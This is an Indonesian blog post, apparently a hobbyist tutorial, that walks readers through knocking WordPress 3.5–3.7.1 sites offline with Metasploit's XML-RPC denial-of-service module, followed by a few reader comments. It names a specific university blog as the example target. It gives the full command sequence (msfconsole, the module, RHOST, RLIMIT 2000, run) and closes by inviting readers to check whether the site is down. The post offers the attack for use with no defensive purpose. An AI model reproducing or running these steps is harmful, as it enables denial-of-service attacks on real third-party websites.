Oke kali ini saya akan share exploit lama. barang kali ada yang belum tahu Bug atau Exploit ini. langsung saja pada inti tutorial ini.
Pertama cari target wordpress yang versi 3.5 atau 3.7
Example : http://blog.iain-tulungagung.ac.id/ <<<== Wordpress versi 3.7
Bug : WordPress 3.5 - 3.7.1 XML-RPC DoS
Tutorial Kali ini menggunakan Metasploit. Pertama buka metasploit, jika belum ada silahkan download dan install dulu :D mau pake versi windows atau linux sama aja hehehe. kalau saya pake Linux VPS :p . untuk yang pake linux silahkan ketik perintah berikut untuk membuka metasploit yang sudah terinstall :
msfconsole
Lalu tunggu sampai muncul seperti gambar di bawah ini kurang lebihnya :
Setalah muncul seperti gambar itu kita gunakan Modul Metasploit auxiliary/dos/http/wordpress_xmlrpc_dos dengan perintah berikut ini :
use auxiliary/dos/http/wordpress_xmlrpc_dos
Kemudian kita tampilkan settingan apa aja yang perlu di set untuk modul ini. cara menampilkan settingannya dengan perintah berikut :
show options
Options setting yang Required/Perlu adalah RHOST, RLIMIT, RPORT, TARGETURI, tutorial untuk settingnya cukup mudah. ikuti perintah berikut
msf auxiliary(wordpress_xmlrpc_dos) > set RHOST blog.iain-tulungagung.ac.idRHOST => blog.iain-tulungagung.ac.idmsf auxiliary(wordpress_xmlrpc_dos) > set RLIMIT 2000RLIMIT => 2000msf auxiliary(wordpress_xmlrpc_dos) > set RPORT 80RPORT => 80msf auxiliary(wordpress_xmlrpc_dos) > set TARGETURI /TARGETURI => /msf auxiliary(wordpress_xmlrpc_dos) >
RHOST = Menentukan Host/Web Target yang ingin di exploit
RLIMIT = Menentukan jumlah paket DoS yang dikirim semakin banyak semakin cepat down itu web
RPORT = Menetukan port target Default port 80
TARGETURI = Menentukan path atau direcroty website yag di serang
Setelah semua selesai di setting sekarang kita jalankan exploit dengan perintah berikut :
run
Kalau exploit jalan akan telihat seperti gambar dibawah ini :
Selesai :D dan kita lihat web target apakah sudah lumpuh atau belum. hehehe
sekian tutorial newbie dari saya :D semoga bermanfaaat
Tutor baru ni om ya...
BalasHapusjadi nakut ni mau install wordpress
pake blogger aja om aman :v
Hapushati" dengan mbah roni ...:v
BalasHapusada apa dengan mbah roni :3
HapusPosting Komentar